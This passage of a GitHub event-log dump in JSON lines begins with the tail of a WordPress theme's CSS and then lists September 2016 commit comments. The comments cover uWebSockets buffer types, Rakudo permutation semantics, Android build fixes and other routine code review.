!important;\r\n\t-moz-border-radius:  0px 5px 5px 0px !important;\r\n\tborder-radius:  0px 5px 5px 0px  !important;\r\n}\r\n\r\n#location .location_info_item .sc_section_content {\r\n\tpadding: 1.7em 2.85em;\r\n}\r\n\r\n#location .location_info_item .item_add_title{\r\n\tfont-weight: 400;\r\n\tmargin-top: -17px;\r\n\tmargin-bottom: 0.85em;\r\n}\r\n\r\n#location .location_info_item .open_time{\r\n\tpadding-left: 1.75em;\r\n\tposition: relative;\r\n}\r\n\r\n#location .location_info_item .open_time:before{\r\n\tcontent: '\\e904';\r\n\tfont-family: 'fontello';\r\n\tposition: absolute;\r\n\tleft: 0;\r\n\ttop: 2px;\r\n\tfont-size: 19px;\r\n}\r\n\r\n\r\n#contact-us .columns_wrap {\r\n\tmargin-right: 0px;\r\n}\r\n\r\n#contact-us .sc_column_item {\r\n\tpadding-right: 0;\t\r\n\t\r\n}\r\n\r\n#contact-us .sc_section.column-1_2{\r\n\tpadding-left: 4em;\r\n\tbox-sizing: border-box;\r\n\tdisplay: inline-block;\r\n}\r\n\r\n#contact-us .sc_googlemap{\r\n\t-webkit-border-radius: 0px !important;\r\n\t-moz-border-radius: 0px !important;\r\n\tborder-radius: 0px !important;\r\n}\r\n\r\n#contact-us .content_section{\r\n\twidth: 585px;\r\n}\r\n\r\n#contact-us .sc_icon{\r\n\twidth: 2.3em;\r\n\theight: 2.3em;\r\n\tline-height: 2.3em;\r\n\tposition: absolute;\r\n\tleft: 0;\r\n\r\n}\r\n\r\n#contact-us .sc_icon:before{\r\n\tfont-size: 27px;\r\n}\r\n\r\n#team-block1{\r\n\tbackground-position: center; \r\n}\r\n\r\n.single-services .sidebar .widget_nav_menu,\r\n.sidebar_show.sidebar_left.woocommerce-page .widget_product_categories{\r\n\tpadding: 2.4em;\r\n}\r\n\r\n.single-services .sidebar .widget_nav_menu .widget_title,\r\n.sidebar_show.sidebar_left.woocommerce-page .widget_product_categories .widget_title{\r\n\tfont-size: 1.438em;\r\n\tborder: none;\r\n}\r\n\r\n.single-services .sidebar .widget_nav_menu ul li,\r\n.sidebar_show.sidebar_left.woocommerce-page .widget_product_categories ul li{\r\n\tline-height: 1.4em;\r\n\tfont-size: 1.125em;\r\n\tpadding-left: 0;\r\n}\r\n\r\n.single-services .sidebar .widget_nav_menu ul li:before,\r\n.sidebar_show.sidebar_left.woocommerce-page .widget_product_categories ul li:before{\r\n\tright: -14px;\r\n\tleft: inherit;\r\n\tcontent: '';\r\n}\r\n\r\n.single-services .sidebar .widget_nav_menu ul li.current-menu-item:before,\r\n.sidebar_show.sidebar_left.woocommerce-page .widget_product_categories ul li.current-cat:before{\r\n\tcontent: '\\e8f3';\r\n}\r\n\r\n.post_item_masonry .post_title{\r\n\ttext-align: center;\r\n\tfont-size: 1.55em;\r\n\tfont-weight: 600;\r\n}\r\n\r\n.post_info_item.post_info_posted_by a:before{\r\n\tpadding-right: 4px;\r\n\tfont-weight: 400;\r\n}\r\n\r\n.post_item_excerpt .sc_button {\r\n\tmargin-top: 2.5em;\r\n}\r\n\r\n.template_excerpt blockquote {\r\n\tmargin-left: 0;\r\n\tmargin-right: 12%;\r\n}\r\n\r\n\r\n.custom_header_wrap{\r\n\tposition: relative;\r\n\twidth: 100%;\r\n\tmargin-bottom: 3.5em;\r\n\t-webkit-border-radius: 5px !important;\r\n\t-moz-border-radius: 5px !important;\r\n\tborder-radius: 5px !important;\r\n\toverflow: hidden;\r\n}\r\n\r\n.custom_header_wrap .header_content_wrap{\r\n\tz-index: 2;\r\n\tposition: relative;\r\n\ttext-align: center;\r\n\tpadding: 6.85em 0;\r\n\r\n}\r\n\r\n.custom_header_wrap .woocommerce_custom_header{\r\n\theight: 100%;\r\n\tposition: absolute;\r\n\twidth: 100%;\r\n\tz-index: 1;\r\n}\r\n\r\n.custom_header_wrap .slogan_header,\r\n.custom_header_wrap .title_header{\r\n\tmargin-bottom: 0;\r\n}\r\n\r\n.woocommerce-cart .custom_header_wrap,\r\n.woocommerce-checkout .custom_header_wrap,\r\n.single .custom_header_wrap{\r\n\tdisplay: none !important;\r\n}\r\n\r\n\r\n.woocommerce-ordering{position: relative;}\r\n\r\n.woocommerce-ordering:after{\r\n\tcontent: '\\e8f2';\r\n\tfont-family: 'fontello';\r\n\tposition: absolute;\r\n\tdisplay: block;\r\n\ttop: 25%;\r\n\tright: 10px;\r\n}\r\n\r\n\r\n.menu_main_nav > li+li > a {\r\n\tborder-left: 1px solid;\r\n\tpadding-left: .88em;\r\n    margin-left: .88em;\r\n}\r\n\r\n\r\n.single-team .content .sc_image img{\r\n\tposition: relative;\r\n\ttop: -50px;}\r\n\r\n.tp-bullet{\r\n\twidth: 14px;\r\n\theight: 14px;\r\n}\r\n\r\n.single-team .content .sc_form_wrap{margin-top: 4em;}"}},"created_at":"2016-09-11T13:54:06Z"}
{"id":"4545858070","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"GuneetAtwal/kenzo"},"payload":{"comment":{"id":18977050,"position":null,"line":null,"path":null,"commit_id":"003125dbbba200cc661a28de87c3bf0ba87b0812","created_at":"2016-09-11T13:55:00Z","updated_at":"2016-09-11T13:55:00Z","body":"Okaaaaay..."}},"created_at":"2016-09-11T13:55:00Z"}
{"id":"4545858135","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/DevTools"},"payload":{"comment":{"id":18977051,"position":null,"line":null,"path":null,"commit_id":"5fab38943b6c302ee9dddea90b8b38e9c6ebe31e","created_at":"2016-09-11T13:55:03Z","updated_at":"2016-09-11T13:55:03Z","body":"@ishitatsuyuki yes, I saw your PR to the original repo"}},"created_at":"2016-09-11T13:55:03Z"}
{"id":"4545858759","type":"CommitCommentEvent","actor":{"login":"weitjong"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18977052,"position":null,"line":null,"path":null,"commit_id":"6323aed69ab056b1626c46a242a8dbbc40e39e3e","created_at":"2016-09-11T13:55:29Z","updated_at":"2016-09-11T13:55:29Z","body":"The enum order is a bit weird."}},"created_at":"2016-09-11T13:55:29Z"}
{"id":"4545861521","type":"CommitCommentEvent","actor":{"login":"LionNatsu"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":18977054,"position":1,"line":1,"path":"extra-kernel/linux-kernel/autobuild/postrm","commit_id":"5d8e1d5b6502eb1323ffeebba044b0cbdcf6f5b5","created_at":"2016-09-11T13:57:33Z","updated_at":"2016-09-11T13:57:33Z","body":"Hard-coding version...?"}},"created_at":"2016-09-11T13:57:33Z"}
{"id":"4545863068","type":"CommitCommentEvent","actor":{"login":"demsey"},"repo":{"name":"jpos/jPOS"},"payload":{"comment":{"id":18977056,"position":null,"line":null,"path":null,"commit_id":"8a12c1870b469d3d12c281d3f0105c33bfec6185","created_at":"2016-09-11T13:58:48Z","updated_at":"2016-09-11T13:58:48Z","body":"On the other hand, I do not understand why jPOS maintains 2 arrays `ISOUtil.EBCDIC2ASCII` and `ISOUtil.ASCII2EBCDIC` (exposed as public) when they can be populated at runtime as codes of  `Charset.forName(\"IBM1047\")` (aka EBCDIC)\r\nSome time ago i have checked that this encoding produces exacly same byte codes."}},"created_at":"2016-09-11T13:58:48Z"}
{"id":"4545863556","type":"CommitCommentEvent","actor":{"login":"MingcongBai"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":18977057,"position":1,"line":1,"path":"extra-kernel/linux-kernel/autobuild/postrm","commit_id":"5d8e1d5b6502eb1323ffeebba044b0cbdcf6f5b5","created_at":"2016-09-11T13:59:12Z","updated_at":"2016-09-11T13:59:12Z","body":"I guess I could have tried some sed tricks."}},"created_at":"2016-09-11T13:59:12Z"}
{"id":"4545863679","type":"CommitCommentEvent","actor":{"login":"dgilperez"},"repo":{"name":"beanieboi/morrisjs-rails"},"payload":{"comment":{"id":18977058,"position":null,"line":null,"path":null,"commit_id":"8ccdd65127eafa9926e680f20c028310c368be61","created_at":"2016-09-11T13:59:18Z","updated_at":"2016-09-11T13:59:18Z","body":"Great! \r\n\r\nCare to cut a new gem version?"}},"created_at":"2016-09-11T13:59:18Z"}
{"id":"4545864054","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"nitrogen-os-devices/android_vendor_lge_hammerhead"},"payload":{"comment":{"id":18977059,"position":null,"line":null,"path":null,"commit_id":"d7a5ed70db5628c780d3dd14181b0e70451003e6","created_at":"2016-09-11T13:59:36Z","updated_at":"2016-09-11T13:59:36Z","body":"@wakaber \r\nбуду дальше ванговать ну хоть что-то исправилось"}},"created_at":"2016-09-11T13:59:36Z"}
{"id":"4545864621","type":"CommitCommentEvent","actor":{"login":"quyencao"},"repo":{"name":"quyencao/Higher-Order-Component-React-Redux"},"payload":{"comment":{"id":18977060,"position":13,"line":18,"path":"src/index.js","commit_id":"ef428c9c6ad7dc106d6b11d34189347198c7c2cc","created_at":"2016-09-11T14:00:02Z","updated_at":"2016-09-11T14:00:02Z","body":"if need All RESOURCE IN APP USE AUTH IT IS GOOD TO export default requireAuth(Resources) in RESOURCE FILE"}},"created_at":"2016-09-11T14:00:02Z"}
{"id":"4545864753","type":"CommitCommentEvent","actor":{"login":"rhkddn1657"},"repo":{"name":"rhkddn1657/practice"},"payload":{"comment":{"id":18977061,"position":7,"line":7,"path":"BookExample/Button.java","commit_id":"13f44e46a46ad222b42ee81b066c2042cdf84a00","created_at":"2016-09-11T14:00:08Z","updated_at":"2016-09-11T14:00:08Z","body":"d"}},"created_at":"2016-09-11T14:00:08Z"}
{"id":"4545867060","type":"CommitCommentEvent","actor":{"login":"ecogrammer"},"repo":{"name":"ito-artsfarm/itoartsfarm2016-wp"},"payload":{"comment":{"id":18977064,"position":null,"line":null,"path":null,"commit_id":"4adc2b92ef4e9d3ca296257ea90b8272e115accd","created_at":"2016-09-11T14:01:29Z","updated_at":"2016-09-11T14:01:29Z","body":"本番 http://www.ito-artsfarm.com/ に反映させましたー"}},"created_at":"2016-09-11T14:01:29Z"}
{"id":"4545868578","type":"CommitCommentEvent","actor":{"login":"socmag"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977066,"position":null,"line":null,"path":null,"commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:02:29Z","updated_at":"2016-09-11T14:02:29Z","body":"w00t!\n\nOn Sep 11, 2016 3:45 PM, \"Alex Hultman\" <notifications@github.com> wrote:\n\n> This commit increases Node.js performance by about 100% in throughput:\n>\n> Throughput: 20k, 20, 10, 3000:\n>\n> Node.js (before): 300 echoes/ms\n> Node.js (now): 570 echoes/ms\n> C++: 1100 echoes/ms\n>\n> Throughput: 1, 20, 2000, 3000:\n>\n> Node.js (before): 450 echoes/ms\n> Node.js (now): 1000 echoes/ms\n> C++: about 5000 echoes/ms (don't care to remember)\n>\n> @lpinca <https://github.com/lpinca> This will break the Primus\n> transformer, and might break your app if you expect to receive binary data\n> as Node.js Buffer. All binary data is now ArrayBuffer which can be wrapped\n> into a Node.js Buffer or any TypedArray like Uint8Array, etc.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uWebSockets/uWebSockets/commit/56abcced914497e1fc4fe24304b86564bc4aca8d#commitcomment-18977022>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGQZ0oSGsrC0f5t8nKgeGNWGWsubuetIks5qpAYGgaJpZM4J6Ao6>\n> .\n>\n"}},"created_at":"2016-09-11T14:02:29Z"}
{"id":"4545868861","type":"CommitCommentEvent","actor":{"login":"freshgiammi"},"repo":{"name":"AOSPlusone/android_hardware_qcom_display"},"payload":{"comment":{"id":18977067,"position":null,"line":null,"path":null,"commit_id":"f881bb5247059ff03253c3fbe762487354c0d9b5","created_at":"2016-09-11T14:02:42Z","updated_at":"2016-09-11T14:02:42Z","body":"@Ordenkrieger You're probably building on the wrong branch. Look for the \"nougat\" one."}},"created_at":"2016-09-11T14:02:42Z"}
{"id":"4545871040","type":"CommitCommentEvent","actor":{"login":"sharkwinter"},"repo":{"name":"shadowsocks/openwrt-shadowsocks"},"payload":{"comment":{"id":18977069,"position":null,"line":null,"path":null,"commit_id":"f21785791c559a64500da0aa8863a86b18e357df","created_at":"2016-09-11T14:04:01Z","updated_at":"2016-09-11T14:04:01Z","body":"@aa65535 @simonsmh \r\n\r\nThank you both! it worked!"}},"created_at":"2016-09-11T14:04:01Z"}
{"id":"4545872019","type":"CommitCommentEvent","actor":{"login":"sadiaahmedmonika"},"repo":{"name":"sadiaahmedmonika/ScrollTop"},"payload":{"comment":{"id":18977070,"position":null,"line":null,"path":null,"commit_id":"699a4fd0dc81b383b023ac4c1ffeef04475a5ad5","created_at":"2016-09-11T14:04:44Z","updated_at":"2016-09-11T14:04:44Z","body":"You can add scroll top js in your index file by using this script.js\r\n"}},"created_at":"2016-09-11T14:04:44Z"}
{"id":"4545873513","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977072,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:05:43Z","updated_at":"2016-09-11T14:05:43Z","body":"So `message` is always an `ArrayBuffer`? How do I know if it was binary data or not?"}},"created_at":"2016-09-11T14:05:43Z"}
{"id":"4545874455","type":"CommitCommentEvent","actor":{"login":"1vanK"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18977073,"position":null,"line":null,"path":null,"commit_id":"6323aed69ab056b1626c46a242a8dbbc40e39e3e","created_at":"2016-09-11T14:06:25Z","updated_at":"2016-09-11T14:06:25Z","body":"Hm, yes. The old habit append new enums to end of list. I forgot that in Urho changing of order not corrupt backward compatibility"}},"created_at":"2016-09-11T14:06:25Z"}
{"id":"4545874665","type":"CommitCommentEvent","actor":{"login":"laotanggit"},"repo":{"name":"laotanggit/okhttputils-masterlaotang"},"payload":{"comment":{"id":18977074,"position":null,"line":null,"path":null,"commit_id":"2d9584d08f97359f41f10f0033c0c5692293c88f","created_at":"2016-09-11T14:06:32Z","updated_at":"2016-09-11T14:06:32Z","body":"简单的测试下"}},"created_at":"2016-09-11T14:06:32Z"}
{"id":"4545874695","type":"CommitCommentEvent","actor":{"login":"Olinth"},"repo":{"name":"Olinth/TextBasedAdventure"},"payload":{"comment":{"id":18977075,"position":null,"line":null,"path":null,"commit_id":"3048c64159a121b166ed2b848f52e63b7d2bdf0b","created_at":"2016-09-11T14:06:34Z","updated_at":"2016-09-11T14:06:34Z","body":"Not needed."}},"created_at":"2016-09-11T14:06:34Z"}
{"id":"4545877873","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"nitrogen-os-devices/android_device_lge_mako"},"payload":{"comment":{"id":18977076,"position":null,"line":null,"path":null,"commit_id":"124a0e8fd80bfc57fe023f66d0d55bb7e719ee6b","created_at":"2016-09-11T14:08:49Z","updated_at":"2016-09-11T14:08:49Z","body":"```\r\n<!-- enable doze powersaving mode -->\r\n<bool name=\"config_enableAutoPowerModes\">true</bool>\r\n```\r\nThis should be a separate commit\r\nDelete this strings, save file, and:\r\n```\r\ngit add -A\r\ngit commit --amend\r\ngit push -f\r\n```"}},"created_at":"2016-09-11T14:08:49Z"}
{"id":"4545878812","type":"CommitCommentEvent","actor":{"login":"fridabaharizki"},"repo":{"name":"fridabaharizki/PIZZAHAHA"},"payload":{"comment":{"id":18977078,"position":7,"line":7,"path":"README.md","commit_id":"5d31957bb549bd7006a9a4687485b58375d8a1db","created_at":"2016-09-11T14:09:26Z","updated_at":"2016-09-11T14:09:26Z","body":"Re: https://docs.google.com/uc?id=0B-L5pZMtb_ElbE82LUtkUkZ5Wk0"}},"created_at":"2016-09-11T14:09:26Z"}
{"id":"4545880625","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977085,"position":36,"line":36,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T14:10:39Z","updated_at":"2016-09-11T14:10:39Z","body":"It seems that julia does not support multiple dispatch for keywords arguments.\r\nI don't know whether there is a way to make `matrix(rand(10), nrow=5)` and `matrix(rand(10), nrow=5, ncol=2)` work."}},"created_at":"2016-09-11T14:10:39Z"}
{"id":"4545882875","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977087,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:12:15Z","updated_at":"2016-09-11T14:12:15Z","body":"It is either String or ArrayBuffer"}},"created_at":"2016-09-11T14:12:15Z"}
{"id":"4545883133","type":"CommitCommentEvent","actor":{"login":"dpastoor"},"repo":{"name":"dpastoor/r-pharmsciences"},"payload":{"comment":{"id":18977088,"position":18,"line":17,"path":"README.md","commit_id":"f9b6a5262b65b8299e2008c12da8f2c99c56ad6d","created_at":"2016-09-11T14:12:25Z","updated_at":"2016-09-11T14:12:25Z","body":"No problem! btw it is readable and rendered here! http://devinpastoor.com/r-pharmsciences/\r\n\r\nThere should be a major update in the next month that will ~double the amount of content, focusing more on modern packages like dplyr/tidyr/purrr to feel free to check back!"}},"created_at":"2016-09-11T14:12:25Z"}
{"id":"4545884968","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":18977092,"position":null,"line":null,"path":null,"commit_id":"2121297a3bc86f8f5c2af475d7f1f593777e896b","created_at":"2016-09-11T14:13:43Z","updated_at":"2016-09-11T14:13:43Z","body":"It's not fixed since ruby-ffi isn't built.\r\n\r\nIt's preferred to add lilac support for ruby-fi and then use `depends = ['ruby-ffi']`."}},"created_at":"2016-09-11T14:13:43Z"}
{"id":"4545885097","type":"CommitCommentEvent","actor":{"login":"franciscoeaj"},"repo":{"name":"gabrielguim/scribe-si1"},"payload":{"comment":{"id":18977093,"position":3,"line":11,"path":"app/assets/javascripts/controllers/userController.js","commit_id":"c845d04579b5b70ee01e3f735b2a8c898668c329","created_at":"2016-09-11T14:13:49Z","updated_at":"2016-09-11T14:13:49Z","body":"Esse código não deveria ter sido removido. Foi alguma falta de atenção da minha parte ao fazer 'git pull' no outro ambiente. O código removido é responsável por autenticar o usuário, dessa forma, o commit 'c845d04' não autenticava o usuário."}},"created_at":"2016-09-11T14:13:49Z"}
{"id":"4545885533","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977095,"position":null,"line":null,"path":null,"commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:14:08Z","updated_at":"2016-09-11T14:14:08Z","body":"I added a list of the most important incompatibilities: https://github.com/uWebSockets/uWebSockets#nodejs"}},"created_at":"2016-09-11T14:14:08Z"}
{"id":"4545887634","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977097,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:15:30Z","updated_at":"2016-09-11T14:15:30Z","body":"Ah ok, I'll patch Primus with something like `'string' === typeof msg ? msg : Buffer.from(msg)` then."}},"created_at":"2016-09-11T14:15:30Z"}
{"id":"4545888191","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977098,"position":null,"line":null,"path":null,"commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T14:15:54Z","updated_at":"2016-09-11T14:15:54Z","body":"I think i did it! Now i just have to figure out how to store in data after you sign up again..."}},"created_at":"2016-09-11T14:15:54Z"}
{"id":"4545888485","type":"CommitCommentEvent","actor":{"login":"b2gills"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":18977100,"position":null,"line":null,"path":null,"commit_id":"bb6da769bd26fd5f831deb0edf886c7808ec974b","created_at":"2016-09-11T14:16:07Z","updated_at":"2016-09-11T14:16:07Z","body":"The Wikipedia [page for permutation](https://en.wikipedia.org/wiki/Permutation) says\r\n\r\n> The number of permutations of 𝑛 distinct objects is 𝑛 factorial, usually written as 𝑛!, which means the product of all positive integers less than or equal to 𝑛.\r\n\r\nThe Wikipedia [page for factorial](https://en.wikipedia.org/wiki/Factorial) says\r\n\r\n> … Its most basic occurrence is the fact that there are 𝑛! ways to arrange 𝑛 distinct objects into a sequence (i.e., permutations of the set of objects). …\r\n\r\nThe `count-only` method on the `permutations(…)` iterator even uses factorial to return the correct number.\r\n\r\nThe factorial of 0 is 1, don't believe that see the [Numberphile video on 0!](https://www.youtube.com/watch?v=Mfk_L4Nx2ZI).\r\nThere is a [Khan Academy video as well](https://www.youtube.com/watch?v=HGoZfzz6dU0)\r\n( The Wikipedia page for factorial even states that `0! == 1` )\r\n\r\nIf anybody wants to show off Perl 6 as getting math right because `.1 + .2 == .3`, why would we want to get it wrong by saying `permutations(0).elems != 0!` or `().permutations.elems != 0!`\r\n\r\nHaving `permutations(0)` and `().permutations` return `((),).Seq` is the easiest way to have the math work out correctly.\r\n( It could be argued that since `permutations(1)` returns a Seq with an iterator that has `count-only` method that `permutations(0)` should as well )"}},"created_at":"2016-09-11T14:16:07Z"}
{"id":"4545889100","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18977101,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-11T14:16:32Z","updated_at":"2016-09-11T14:16:32Z","body":"@SubJunk I don't remember all the details, I switched to V1 a loong time ago, but I think spawning multiple threads to handle one request was one of them. It generally gave me a cleaner log with fewer errors so it was easier for me to track whatever I was trying to debug.\r\n\r\nStill I haven't gotten any answer to what V2 does better.\r\n\r\n@atamariya That's just technicalities. If you compare ```RequestHandlerV1``` and ```RequestHandlerV2``` you will see that most of the code is actually the same. How does it mather if it is registered as a subclass? That's probably just to get access to the Netty comminication objects."}},"created_at":"2016-09-11T14:16:32Z"}
{"id":"4545890610","type":"CommitCommentEvent","actor":{"login":"skmedix"},"repo":{"name":"etlegacy/etlegacy"},"payload":{"comment":{"id":18977102,"position":null,"line":null,"path":null,"commit_id":"95d7888beffb7ab6bc92b1e7e978e224df352845","created_at":"2016-09-11T14:17:35Z","updated_at":"2016-09-11T14:17:35Z","body":"🏆 "}},"created_at":"2016-09-11T14:17:35Z"}
{"id":"4545892757","type":"CommitCommentEvent","actor":{"login":"AndrejValerjevich"},"repo":{"name":"AndrejValerjevich/Test"},"payload":{"comment":{"id":18977105,"position":44,"line":44,"path":"index.html","commit_id":"e867658d0ca8d8262eb9a9e1e929c44fc62eeeda","created_at":"2016-09-11T14:19:04Z","updated_at":"2016-09-11T14:19:04Z","body":"<p>Сегодняшняя дата (согласно данному веб-серверу) (ха):\r\n\r\n       <?php\r\n\r\n       echo date('l, F  jS Y.');\r\n\r\n?> "}},"created_at":"2016-09-11T14:19:04Z"}
{"id":"4545893265","type":"CommitCommentEvent","actor":{"login":"lizmat"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":18977107,"position":null,"line":null,"path":null,"commit_id":"bb6da769bd26fd5f831deb0edf886c7808ec974b","created_at":"2016-09-11T14:19:25Z","updated_at":"2016-09-11T14:19:25Z","body":"Consider me convinced  :-)   See 2323420d4952fae28b .  Going to take a look at speeding up combinations() / List.combinations shortly.\n\n> On 11 Sep 2016, at 16:16, Brad Gilbert <notifications@github.com> wrote:\n> \n> The Wikipedia page for permutation says\n> \n> The number of permutations of 𝑛 distinct objects is 𝑛 factorial, usually written as 𝑛!, which means the product of all positive integers less than or equal to 𝑛.\n> \n> The Wikipedia page for factorial says\n> \n> … Its most basic occurrence is the fact that there are 𝑛! ways to arrange 𝑛 distinct objects into a sequence (i.e., permutations of the set of objects). …\n> \n> The count-only method on the permutations(…) iterator even uses factorial to return the correct number.\n> \n> The factorial of 0 is 1, don't believe that see the Numberphile video on 0!.\n> There is a Khan Academy video as well\n> ( The Wikipedia page for factorial even states that 0! == 1 )\n> \n> If anybody wants to show off Perl 6 as getting math right because .1 + .2 == .3, why would we want to get it wrong by saying permutations(0).elems != 0! or ().permutations.elems != 0!\n> \n> Having permutations(0) and ().permutations return ((),).Seq is the easiest way to have the math work out correctly.\n> ( It could be argued that since permutations(1) returns a Seq with an iterator that has count-only method that permutations(0) should as well )\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-11T14:19:25Z"}
{"id":"4545893380","type":"CommitCommentEvent","actor":{"login":"AndrejValerjevich"},"repo":{"name":"AndrejValerjevich/Test"},"payload":{"comment":{"id":18977108,"position":29,"line":29,"path":"index.html","commit_id":"e867658d0ca8d8262eb9a9e1e929c44fc62eeeda","created_at":"2016-09-11T14:19:30Z","updated_at":"2016-09-11T14:19:30Z","body":"<p>Сегодняшняя дата:\r\n\r\n       <?php\r\n\r\n       echo date('l, F  jS Y.');\r\n\r\n?> "}},"created_at":"2016-09-11T14:19:30Z"}
{"id":"4545893659","type":"CommitCommentEvent","actor":{"login":"fenollp"},"repo":{"name":"2600hz/kazoo"},"payload":{"comment":{"id":18977109,"position":8,"line":28,"path":"core/kazoo_attachments/src/kz_att_link.erl","commit_id":"a8e7ee1abbf3e68259be5b7aa7b28f9cb00941bb","created_at":"2016-09-11T14:19:44Z","updated_at":"2016-09-11T14:19:44Z","body":"att_name <--- typo?"}},"created_at":"2016-09-11T14:19:44Z"}
{"id":"4545895210","type":"CommitCommentEvent","actor":{"login":"lazedo"},"repo":{"name":"2600hz/kazoo"},"payload":{"comment":{"id":18977113,"position":8,"line":28,"path":"core/kazoo_attachments/src/kz_att_link.erl","commit_id":"a8e7ee1abbf3e68259be5b7aa7b28f9cb00941bb","created_at":"2016-09-11T14:20:46Z","updated_at":"2016-09-11T14:20:46Z","body":"yep. fixing."}},"created_at":"2016-09-11T14:20:46Z"}
{"id":"4545896601","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18977114,"position":null,"line":null,"path":null,"commit_id":"298ce6144ffcffbb3a469c0ae85723194b3f5950","created_at":"2016-09-11T14:21:40Z","updated_at":"2016-09-11T14:21:40Z","body":"now it works perfectly, thanks."}},"created_at":"2016-09-11T14:21:40Z"}
{"id":"4545897510","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977116,"position":null,"line":null,"path":null,"commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T14:22:18Z","updated_at":"2016-09-11T14:22:18Z","body":"Here's some sample code with arrays :)\r\n\r\n```js\r\nvar numbers = [];\r\nnumbers.push(1); // now your array is [1]\r\nnumbers.push(2); // now your array contains [1,2]\r\n```\r\n\r\nYou can push any data type into an array. Hope that helps!"}},"created_at":"2016-09-11T14:22:18Z"}
{"id":"4545903076","type":"CommitCommentEvent","actor":{"login":"Vaelatern"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18977118,"position":null,"line":null,"path":null,"commit_id":"1fc3adddb6183666a0acc8b900f609afcabed596","created_at":"2016-09-11T14:26:09Z","updated_at":"2016-09-11T14:26:09Z","body":"#4572 "}},"created_at":"2016-09-11T14:26:09Z"}
{"id":"4545904084","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977120,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:26:52Z","updated_at":"2016-09-11T14:26:52Z","body":"Does Primus only expose Node.js Buffer? The construction of a Buffer is mainly what took so long time, even though it is zero-copy of the ArrayBuffer. Anyways, yes that is a good solution. This will be version 0.9.0. You also need to copy the buffer if you expect the user to hold on to it past the callback."}},"created_at":"2016-09-11T14:26:52Z"}
{"id":"4545905013","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977121,"position":9,"line":57,"path":"README.md","commit_id":"44470700db7ff235c74c80ecbe1441594a631b4e","created_at":"2016-09-11T14:27:31Z","updated_at":"2016-09-11T14:27:31Z","body":"I might be annoying but `webSocket` is not an `EventEmitter`:\r\n\r\n1. You can't use custom events `ws.on('foo', () => {}); ws.emit('foo');`.\r\n2. You can't customize the maximum allowed listeners."}},"created_at":"2016-09-11T14:27:31Z"}
{"id":"4545908677","type":"CommitCommentEvent","actor":{"login":"sultanqasim"},"repo":{"name":"Moto8610/android_device_motorola_msm8610-common"},"payload":{"comment":{"id":18977127,"position":null,"line":null,"path":null,"commit_id":"7aa8b8503b18568626206cc00c7d87025d97d3d9","created_at":"2016-09-11T14:30:10Z","updated_at":"2016-09-11T14:30:10Z","body":"I tried -fno-pic for just the module and for both the kernel and module. While it fixed one issue reported in dmesg loading the module, insmod just failed with a different error instead (bad address). Since I don't need to maintain compatibility with stock (unlike 8916), I didn't bother messing around further and just built it in."}},"created_at":"2016-09-11T14:30:10Z"}
